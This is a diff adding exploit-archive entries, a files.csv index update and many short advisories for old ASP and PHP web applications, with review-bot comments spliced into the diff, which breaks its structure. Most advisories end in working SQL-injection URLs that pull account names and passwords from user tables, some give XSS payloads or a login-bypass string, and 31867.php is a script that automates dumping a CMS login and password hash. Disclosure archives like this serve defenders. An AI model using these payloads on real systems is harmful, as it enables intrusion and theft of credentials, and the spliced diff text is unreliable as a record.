diff --git a/files.csv b/files.csv
index 1d512090f..9e839ef95 100755
--- a/files.csv
+++ b/files.csv
@@ -28579,6 +28579,7 @@ id,file,description,date,author,platform,type,port
 31786,platforms/asp/webapps/31786.txt,"Cisco BBSM Captive Portal 5.3 'AccesCodeStart.asp' Cross-Site Scripting Vulnerability",2008-05-13,"Brad Antoniewicz",asp,webapps,0
 31787,platforms/php/webapps/31787.txt,"Kalptaru Infotech Automated Link Exchange Portal 'linking.page.php' SQL Injection Vulnerability",2008-05-13,HaCkeR_EgY,php,webapps,0
 31788,platforms/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 GetHttpResponse() - MITM Remote Code Execution Exploit",2014-02-20,"Julien Ahrens",windows,remote,0
+31789,platforms/windows/remote/31789.py,"PCMAN FTP 2.07 - Buffer Overflow Exploit",2014-02-20,Sumit,windows,remote,21
 31790,platforms/hardware/webapps/31790.txt,"Barracuda Firewall 6.1.0.016 - Multiple Vulnerabilities",2014-02-20,Vulnerability-Lab,hardware,webapps,0
 31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 ""CATV5_Backbone_Bus"" - Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555
 31792,platforms/php/webapps/31792.txt,"Stark CRM 1.0 - Multiple Vulnerabilities",2014-02-20,LiquidWorm,php,webapps,80
@@ -28634,3 +28635,29 @@ id,file,description,date,author,platform,type,port
 31843,platforms/asp/webapps/31843.txt,"Excuse Online 'pwd.asp' SQL Injection Vulnerability",2008-05-26,Unohope,asp,webapps,0
 31844,platforms/php/webapps/31844.txt,"phpFix 2.0 fix/browse.php kind Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
 31845,platforms/php/webapps/31845.txt,"phpFix 2.0 auth/00_pass.php account Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
+31846,platforms/php/webapps/31846.txt,"ClassSystem 2.0/2.3 HomepageTop.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
+31847,platforms/php/webapps/31847.txt,"ClassSystem 2.0/2.3 HomepageMain.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
+31848,platforms/php/webapps/31848.txt,"ClassSystem 2.0/2.3 MessageReply.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
+31849,platforms/php/webapps/31849.html,"ClassSystem 2.0/2.3 class/ApplyDB.php Unrestricted File Upload Arbitrary Code Execution",2008-05-26,Unohope,php,webapps,0
+31850,platforms/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 post3/Book.asp review Parameter XSS",2008-05-26,Unohope,asp,webapps,0
+31851,platforms/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 post3/view.asp id Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0
+31852,platforms/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 post3/book.asp review Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0
+31853,platforms/windows/remote/31853.py,"Symantec Endpoint Protection Manager Remote Command Execution Exploit",2014-02-23,"Chris Graham",windows,remote,0
+31854,platforms/asp/webapps/31854.html,"The Campus Request Repairs System 1.2 'sentout.asp' Unauthorized Access Vulnerability",2008-05-26,Unohope,asp,webapps,0
+31855,platforms/php/webapps/31855.txt,"Tr Script News 2.1 'news.php' Cross-Site Scripting Vulnerability",2008-05-27,ZoRLu,php,webapps,0
+31856,platforms/windows/dos/31856.html,"CA Internet Security Suite 'UmxEventCli.dll' ActiveX Control Arbitrary File Overwrite Vulnerability",2008-05-28,Nine:Situations:Group,windows,dos,0
+31857,platforms/php/webapps/31857.txt,"Joomla! and Mambo Artists Component 'idgalery' Parameter SQL Injection Vulnerability",2008-05-28,Cr@zy_King,php,webapps,0
+31858,platforms/php/webapps/31858.txt,"Calcium 3.10/4.0.4 'Calcium40.pl' Cross Site Scripting Vulnerability",2008-05-28,"Marvin Simkin",php,webapps,0
+31859,platforms/asp/webapps/31859.txt,"JustPORTAL 1.0 'site' Parameter Multiple SQL Injection Vulnerabilities",2008-05-29,"Ugurcan Engin",asp,webapps,0
+31860,platforms/asp/webapps/31860.txt,"Proje ASP Portal 2.0 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-05-29,"Ugurcan Engin",asp,webapps,0
+31861,platforms/asp/webapps/31861.txt,"dvbbs 8.2 'login.asp' Multiple SQL Injection Vulnerabilities",2008-05-29,hackerbinhphuoc,asp,webapps,0
+31862,platforms/hardware/remote/31862.txt,"Xerox DocuShare 6 dsdn/dsweb/SearchResults URI XSS",2008-05-29,Doz,hardware,remote,0
+31863,platforms/hardware/remote/31863.txt,"Xerox DocuShare 6 dsdn/dsweb/Services/User URI XSS",2008-05-29,Doz,hardware,remote,0
+31864,platforms/hardware/remote/31864.txt,"Xerox DocuShare 6 docushare/dsweb/ServicesLib/Group URI XSS",2008-05-29,Doz,hardware,remote,0
+31865,platforms/asp/webapps/31865.txt,"DotNetNuke 4.8.3 'Default.aspx' Cross-Site Scripting Vulnerability",2008-05-30,"AmnPardaz Security Research Team",asp,webapps,0
+31866,platforms/php/webapps/31866.txt,"TorrentTrader Classic 1.x 'scrape.php' SQL Injection Vulnerability",2008-05-31,"Charles Vaughn",php,webapps,0
+31867,platforms/php/webapps/31867.php,"CMS Easyway 'mid' Parameter SQL Injection Vulnerability",2008-05-30,Lidloses_Auge,php,webapps,0
+31868,platforms/php/webapps/31868.txt,"OtomiGenX 2.2 'userAccount' Parameter SQL Injection Vulnerability",2008-06-02,hadihadi,php,webapps,0
+31869,platforms/asp/webapps/31869.txt,"i-pos Storefront 1.3 'index.asp' SQL Injection Vulnerability",2008-06-02,KnocKout,asp,webapps,0
+31870,platforms/php/webapps/31870.pl,"Joomla! and Mambo Joo!BB 0.5.9 Component 'forum' Parameter SQL Injection Vulnerability",2008-06-02,His0k4,php,webapps,0
+31871,platforms/asp/webapps/31871.txt,"Te Ecard 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-06-02,"Ugurcan Engyn",asp,webapps,0
diff --git a/platforms/asp/webapps/31850.txt b/platforms/asp/webapps/31850.txt
new file mode 100755
index 000000000..3fd2ef856
--- /dev/null
+++ b/platforms/asp/webapps/31850.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29375/info
+
+Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Campus Bulletin Board 3.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/post3/Book.asp?review=
\ No newline at end of file
diff --git a/platforms/asp/webapps/31851.txt b/platforms/asp/webapps/31851.txt
new file mode 100755
index 000000000..d1f588985
--- /dev/null
+++ b/platforms/asp/webapps/31851.txt
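Review bot: In the second files.csv hunk, row 31871 credits "Ugurcan Engyn" while rows 31859 and 31860 in the same hunk credit "Ugurcan Engin"; if these are the same researcher, an author-based search of the index will miss one entry, so the spelling should be made consistent or confirmed against the source advisory. Row 31858 is filed under platform `php` although the vulnerable script named in its title is `Calcium40.pl`, and rows 31862–31864 are typed `hardware,remote` for what their titles describe as URI XSS in a web application. Anyone filtering the index by platform or type during triage will not find these entries where expected, so both classifications are worth checking before merge.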
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29375/info
+
+Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Campus Bulletin Board 3.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/post3/view.asp?id=-99)+union+select+0,uid,password,3,4,5,6,7,8,9,10+from+user+where+1=(1
\ No newline at end of file
diff --git a/platforms/asp/webapps/31852.txt b/platforms/asp/webapps/31852.txt
new file mode 100755
index 000000000..e64358221
--- /dev/null
+++ b/platforms/asp/webapps/31852.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/29375/info
+
+Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Campus Bulletin Board 3.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/post3/book.asp?review=-99')+union+select+0,password,uid,3,4,5,6,7,8,9,10+from+user+where+1=1+union+select+*+From+公佈欄
+;+Where+'%'=('
\ No newline at end of file
diff --git a/platforms/asp/webapps/31854.html b/platforms/asp/webapps/31854.html
new file mode 100755
index 000000000..371532b98
--- /dev/null
+++ b/platforms/asp/webapps/31854.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29376/info
+
+The Campus Request Repairs System is prone to an unauthorized-access vulnerability because it fails to adequately limit access to administrative scripts used for creating accounts.
+
+An attacker can exploit this vulnerability to gain unauthorized administrative access to the application; other attacks are also possible.
+
+The Campus Request Repairs System 1.2 is vulnerable; other versions may also be vulnerable.
+
+
\ No newline at end of file
diff --git a/platforms/asp/webapps/31859.txt b/platforms/asp/webapps/31859.txt
new file mode 100755
index 000000000..db8c32cfe
--- /dev/null
+++ b/platforms/asp/webapps/31859.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/29426/info
+
+JustPORTAL is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+JustPORTAL 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/lab/JustPORTALv1.0/panel/videogit.asp?site=1+union+select+0,(sifre),kullaniciadi,3,4,5+from+uyeler
+http://www.example.com/lab/JustPORTALv1.0/panel/resimgit.asp?site=1+union+select+0,sifre,kullaniciadi,3,4+from+uyeler
+http://www.example.com/lab/JustPORTALv1.0/panel/menugit.asp?site=1+union+select+0,sifre,kullaniciadi+from+uyeler
+http://www.example.com/lab/JustPORTALv1.0/panel/habergit.asp?site=1+union+select+0,sifre,kullaniciadi,3,4+from+uyeler
\ No newline at end of file
diff --git a/platforms/asp/webapps/31860.txt b/platforms/asp/webapps/31860.txt
new file mode 100755
index 000000000..ee7975770
--- /dev/null
+++ b/platforms/asp/webapps/31860.txt
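Review bot: The advisory text in 31859.txt never says whether the four `panel/*.asp` scripts it lists can be reached without a logged-in session, which is the first thing a defender needs in order to rate exposure. The same gap applies to 31860.txt (every URL is under `portal/yonetici/`) and 31871.txt (`tecard/admin/`); the path names suggest administrative areas, but that is an inference from the names only. Consider adding one line to each file, e.g. `Authentication required: not stated in the source advisory`, so readers do not assume either way.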
@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/29427/info
+
+Proje ASP Portal is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Proje ASP Portal 2.0.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/portal/yonetici/sayfalar.asp?islem=menuduzenle&id=3+union+select+0,kadi,sifre,3,4,5,6+from+uyeler
+http://www.example.com/portal/yonetici/bloklar.asp?islem=bloklar&id=1+union+select+0,sifre,kadi,null,4,5+from+uyeler
+http://www.example.com/portal/yonetici/chat.asp?islem=chat&id=1+union+select+0,sifre+from+uyeler
+http://www.example.com/portal/yonetici/dostsiteler.asp?islem=dost&id=8+union+select+0,kadi,2,sifre+from+uyeler
+http://www.example.com/portal/yonetici/dosya.asp?islem=dosyakategorisiduzenle&id=1+union+select+0,sifre,2,3+from+uyeler
+http://www.example.com/portal/yonetici/dosya.asp?islem=dosyakategorisiduzenle&id=1+union+select+0,kadi,2,3+from+uyeler
+http://www.example.com/portal/yonetici/haber.asp?islem=haber&id=1+union+select+0,1,2,kadi,sifre,5,6,7,8,9+from+uyeler
+http://www.example.com/portal/yonetici/ilan.asp?islem=ilankategorisiduzenle&id=1+union+select+0,sifre,2,3+from+uyeler
+http://www.example.com/portal/yonetici/oyun.asp?islem=oyunkategorisiduzenle&id=1+union+select+0,kadi+from+uyeler
+http://www.example.com/portal/yonetici/oyun.asp?islem=oyunkategorisiduzenle&id=1+union+select+0,sifre+from+uyeler
+http://www.example.com/portal/yonetici/resim.asp?islem=resimkategorisiduzenle&id=1+union+select+0,sifre+from+uyeler
+http://www.example.com/portal/yonetici/resim.asp?islem=resimkategorisiduzenle&id=1+union+select+0,kadi+from+uyeler
+http://www.example.com/portal/yonetici/toplist.asp?islem=toplistkategoriduzenle&id=1+union+select+0,sifre+from+uyeler
+http://www.example.com/portal/yonetici/toplist.asp?islem=toplistkategoriduzenle&id=1+union+select+0,kadi+from+uyeler
+http://www.example.com/portal/yonetici/video.asp?islem=videokategorisiduzenle&id=1+union+select+0,sifre+from+uyeler
+http://www.example.com/portal/yonetici/video.asp?islem=videokategorisiduzenle&id=1+union+select+0,kadi+from+uyeler
+http://www.example.com/portal/yonetici/yazi.asp?islem=yazialtkategoriduzenle&id=1+union+select+0,sifre,2,3+from+uyeler
+http://www.example.com/portal/yonetici/yazi.asp?islem=yazialtkategoriduzenle&id=1+union+select+0,kadi,2,3+from+uyeler
+http://www.example.com/portal/yonetici/uyeler.asp?islem=uyebilgi&id=1+union+select+0,1,2,3,4,sifre,kadi,7,8,1,1,1,1,1,1,9,1,0,1,1,1,1,1,1+from+uyeler
\ No newline at end of file
diff --git a/platforms/asp/webapps/31861.txt b/platforms/asp/webapps/31861.txt
new file mode 100755
index 000000000..17434afee
--- /dev/null
+++ b/platforms/asp/webapps/31861.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/29429/info
+
+The 'dvbbs' program is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+These issues affect dvbbs 8.2; other versions may also be affected.
+
+http:///www.example.com/?password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253
+D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25
+
+
diff --git a/platforms/asp/webapps/31865.txt b/platforms/asp/webapps/31865.txt
new file mode 100755
index 000000000..e8b6fd012
--- /dev/null
+++ b/platforms/asp/webapps/31865.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29437/info
+
+DotNetNuke is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+DotNetNuke 4.8.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/Default.aspx/"onmouseover="x='al';x=x+'ert(/Soroush Dalili From WWW.BugReport.IR/)';eval(x);alert().aspx http://www.example.com/Default.aspx/bugreport/"onmouseover="var a='.aspx?';document.location='http://www.bugreport.ir/?archive';
\ No newline at end of file
diff --git a/platforms/asp/webapps/31869.txt b/platforms/asp/webapps/31869.txt
new file mode 100755
index 000000000..137e7893a
--- /dev/null
+++ b/platforms/asp/webapps/31869.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29471/info
+
+i-pos Storefront is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+i-pos Storefront 1.3 Beta is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings
\ No newline at end of file
diff --git a/platforms/asp/webapps/31871.txt b/platforms/asp/webapps/31871.txt
new file mode 100755
index 000000000..e7aaa4951
--- /dev/null
+++ b/platforms/asp/webapps/31871.txt
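Review bot: The second example URL in 31865.txt sets `document.location` to `http://www.bugreport.ir/?archive`, a live third-party host, whereas the other advisories in this commit use the reserved `www.example.com`. Anyone reproducing the issue in a test browser would be sent to an external site they do not control; replace the target with `http://www.example.com/`. The usage banner in platforms/php/webapps/31867.php has the same problem with `http://www.site.com`. The two URLs in 31865.txt also sit on one line separated only by a space, so it is not obvious that they are separate examples; put each on its own line.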
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/29478/info
+
+Te Ecard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/victim/lab/tecard/admin/pul.asp?gorev=duzenle&id=1+union+select+0,sifre,2+from+editor
+http://www.example.com/victim/lab/tecard/admin/pul.asp?gorev=duzenle&id=1+union+select+0,kullanici_adi,2+from+editor
+http://www.example.com/tecard/admin/card.asp?gorev=duzenle&id=99999+union+select+0x31,null,2,3,sifre,5,6,kullanici_adi,5,0+from+editor+where+id=1
+http://www.example.com/lab/tecard/admin/midi.asp?gorev=duzenle&id=1+union+select+0,1,kullanici_adi,3,4,sifre+from+editor
+http://www.example.com/lab/tecard/admin/cat.asp?gorev=duzenle&id=1+union+select+kullanici_adi,1,sifre,3,4,5+from+editor
+http://www.example.com/lab/tecard/admin/fon.asp?gorev=duzenle&id=1+union+select+0,sifre,2+from+editor
+http://www.example.com/lab/tecard/admin/fon.asp?gorev=duzenle&id=1+union+select+0,kullanici_adi,2+from+editor
\ No newline at end of file
diff --git a/platforms/hardware/remote/31862.txt b/platforms/hardware/remote/31862.txt
new file mode 100755
index 000000000..23a9113a8
--- /dev/null
+++ b/platforms/hardware/remote/31862.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29430/info
+
+Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Xerox DocuShare 6 and prior versions are vulnerable.
+
+http://www.example.com/dsdn/dsweb/SearchResults/XSS
\ No newline at end of file
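Review bot: 31871.txt has no affected-version line, unlike most advisories in this commit, which close the description with a sentence of the form `<product> <version> is vulnerable; other versions may also be affected.`; its files.csv title carries no version either. 31857.txt and 31866.txt have the same omission (the index title for 31866 says `1.x`). Without a version a reader cannot tell whether an installed release is in scope. Add the line if the source advisory gives one, for example `Te Ecard <VERSION_FROM_SOURCE> is vulnerable; other versions may also be affected.`, or state explicitly that the affected version is unknown.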
diff --git a/platforms/hardware/remote/31863.txt b/platforms/hardware/remote/31863.txt
new file mode 100755
index 000000000..a47b24f59
--- /dev/null
+++ b/platforms/hardware/remote/31863.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29430/info
+
+Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Xerox DocuShare 6 and prior versions are vulnerable.
+
+http://www.example.com/dsdn/dsweb/Services/User-XSS
\ No newline at end of file
diff --git a/platforms/hardware/remote/31864.txt b/platforms/hardware/remote/31864.txt
new file mode 100755
index 000000000..cd64a23c0
--- /dev/null
+++ b/platforms/hardware/remote/31864.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29430/info
+
+Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Xerox DocuShare 6 and prior versions are vulnerable.
+
+http://www.example.com/docushare/dsweb/ServicesLib/Group-#/XSS
\ No newline at end of file
diff --git a/platforms/php/webapps/31846.txt b/platforms/php/webapps/31846.txt
new file mode 100755
index 000000000..e17d448b0
--- /dev/null
+++ b/platforms/php/webapps/31846.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29372/info
+
+ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability.
+
+Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable.
+
+http://www.example.com/class/HomepageTop.php?teacher_id=-99'+union+select+0,1,teacher_password,teacher_account,4,5+from+teacher/*
\ No newline at end of file
diff --git a/platforms/php/webapps/31847.txt b/platforms/php/webapps/31847.txt
new file mode 100755
index 000000000..9b9a80f76
--- /dev/null
+++ b/platforms/php/webapps/31847.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29372/info
+
+ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability.
+
+Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable.
+
+http://www.example.com/class/HomepageMain.php?teacher_id=-99'+union+select+0,teacher_account,2,3,4,5,6,7,teacher_password+from+teacher/*
\ No newline at end of file
diff --git a/platforms/php/webapps/31848.txt b/platforms/php/webapps/31848.txt
new file mode 100755
index 000000000..97aa96f0f
--- /dev/null
+++ b/platforms/php/webapps/31848.txt
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29372/info + +ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability. + +Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable. + +http://www.example.com/class/MessageReply.php?teacher_id=1&message_id=-99'+union+select+teacher_account,teacher_password,3,4+from+teacher/* \ No newline at end of file diff --git a/platforms/php/webapps/31849.html b/platforms/php/webapps/31849.html new file mode 100755 index 000000000..f9fbe3da7 --- /dev/null +++ b/platforms/php/webapps/31849.html @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/29372/info + +ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability. + +Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable. + + \ No newline at end of file diff --git a/platforms/php/webapps/31855.txt b/platforms/php/webapps/31855.txt new file mode 100755 index 000000000..455bef68a --- /dev/null +++ b/platforms/php/webapps/31855.txt 
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29388/info
+
+Tr Script News is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Tr Script News 2.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/news/news.php?mode=voir&nb=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/31857.txt b/platforms/php/webapps/31857.txt
new file mode 100755
index 000000000..b78316677
--- /dev/null
+++ b/platforms/php/webapps/31857.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29407/info
+
+The Artists component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+
+http://www.example.com/index.php?option=com_artist&idgalery=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9+from+jos_users/*
+
diff --git a/platforms/php/webapps/31858.txt b/platforms/php/webapps/31858.txt
new file mode 100755
index 000000000..2f043c6d9
--- /dev/null
+++ b/platforms/php/webapps/31858.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29411/info
+
+Calcium is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Calcium 4.0.4 and 3.10 are vulnerable; other versions may also be affected.
+
+http://www.example.com/cgi-bin/Calcium40.pl?Op=ShowIt&CalendarName=[xss]
\ No newline at end of file
diff --git a/platforms/php/webapps/31866.txt b/platforms/php/webapps/31866.txt
new file mode 100755
index 000000000..6219c5598
--- /dev/null
+++ b/platforms/php/webapps/31866.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/29451/info
+
+TorrentTrader Classic is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/scrape.php?info_hash=%22union%20select%201,1,1,1,ip%20from%20users--%20%20%20
\ No newline at end of file
diff --git a/platforms/php/webapps/31867.php b/platforms/php/webapps/31867.php
new file mode 100755
index 000000000..0c5274010
--- /dev/null
+++ b/platforms/php/webapps/31867.php
@@ -0,0 +1,61 @@ +source: http://www.securityfocus.com/bid/29461/info + +CMS Easyway is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + + php '.$argv[0].' http://www.site.com 1 +# +############################################################### +'); +if ($argc == 3) { +echo "\nExploiting in progress:"; +$url = $argv[1]; +$source = file_get_contents($url.'/index.php?mid=null+order+by+100/*'); +$errorcount = substr_count($source,'not a valid MySQL'); +$sql = '/index.php?mid=null+union+select+'; +for ($i = 25; $i>=1; $i--) { + $source = file_get_contents($url.'/index.php?mid=null+order+by+'.$i.'/*'); + if (substr_count($source,'not a valid MySQL')!=$errorcount) { + $errorcount2 = $i; + $i = 1; + } +} +for ($j=1; $j<$errorcount2; $j++) { + $sql = $sql.'concat(0x3a3a3a3a3a,login,0x3a3a313a3a,passwort,0x3a3a323a3a),'; +} +$sql = $sql.'concat(0x3a3a3a3a3a,login,0x3a3a313a3a,passwort,0x3a3a323a3a)+from+cms_benutzer+where+id='.$argv[2].'/*'; +$source = file_get_contents($url.$sql); +echo "\n"; +if (strpos($source,'::::')!=0) { + echo 'User: '.substr($source,strpos($source,'::::')+5,strpos($source,'::1::')-strpos($source,'::::')-5)."\n"; + echo 'Hash: '.substr($source,strpos($source,'::1::')+5,strpos($source,'::2::')-strpos($source,'::1::')-5)."\n"; +} else { + echo 'Exploit failed!'."\n"; +} +} else { +echo "\nNot enough arguments!\n"; +} +?> + + diff --git a/platforms/php/webapps/31868.txt b/platforms/php/webapps/31868.txt new file mode 100755 index 000000000..e0ca55ebe --- /dev/null +++ b/platforms/php/webapps/31868.txt 
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/29470/info
+
+OtomiGenX is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+OtomiGenX 2.2 is affected by this issue; other versions may also be vulnerable.
+
+The following example POST parameters are available to demonstrate this issue:
+
+userAccount: admin ' or 1=1/*
+userPassword: